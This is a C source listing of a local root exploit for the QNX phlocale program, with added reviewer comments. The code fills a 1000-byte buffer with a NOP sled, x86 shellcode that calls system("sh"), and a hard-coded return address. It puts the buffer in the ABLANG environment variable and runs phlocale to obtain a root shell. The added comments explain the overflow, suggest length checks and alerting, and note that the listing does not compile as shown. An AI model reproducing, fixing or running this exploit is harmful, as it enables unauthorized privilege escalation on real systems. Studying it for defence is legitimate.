Text File  |  2005-02-12  |  609b  |  23 lines

  1. /* QNX phlocale $ABLANG exploit, gives you a cute euid=0 shell. 
  2.  * If it doesn't work for you, then you most likely need to change
  3.  * the hard-coded address of system() and/or the return address (ret).
  4.  * 
  5.  * www.badc0ded.com 
  6. */
  7.  
  8. main ()
      /* Builds a 998-byte value for the ABLANG environment variable and then
       * runs /usr/photon/bin/phlocale with that variable set.
       *
       * The header comment says the outcome is an euid=0 shell, so phlocale
       * presumably runs with root privilege and copies $ABLANG into a
       * fixed-size buffer without a length check -- TODO confirm against the
       * vendor advisory; the vulnerable code is not on this page.
       *
       * Defensive takeaways: length-check ABLANG inside phlocale before it is
       * copied, remove the privileged bit from the binary if it is not needed,
       * and treat an ABLANG value of hundreds of non-printable bytes handed to
       * phlocale as an indicator worth alerting on.
       *
       * NOTE(review): the opening brace of main is absent in this listing and
       * no headers are included, so the text does not compile as shown. */
  9.    char s[]="\xeb\x0e\x31\xc0\x5b"       /* s is 23 bytes of what appears to be x86 machine code */
  10.             "\x88\x43\x2\x53\xbb"
  11.             "\x80\x95\x04\x08"       //system() address (0x08049580, little-endian, fixed for one build)
  12.             "\xff\xd3\xe8\xed\xff"
  13.             "\xff\xff\x73\x68";      /* the last two bytes are ASCII "sh" */
  14.    char payload[1000];
         /* Every byte of the buffer starts out as 0x90, the one-byte x86 NOP. */
  15.    memset (payload,0x90,sizeof(payload));
         /* Offsets 971..998 are overwritten with s (23 bytes), the 4-byte value
          * 0x08047b78 (what the header comment calls "the ret") and the
          * terminating NUL, so the write stays inside payload[1000].  Both
          * addresses are absolute, which is why the header comment warns that
          * they only match one particular build of the target. */
  16.    sprintf(payload+971,"%s%s",s,"\x78\x7b\x04\x08");
         /* The buffer reaches the target only through its environment. */
  17.    setenv("ABLANG",payload);
         /* Replaces this process with phlocale; the result is not checked, so a
          * failed exec simply falls off the end of main. */
  18.    execlp("/usr/photon/bin/phlocale","phlocale",0);
  19. }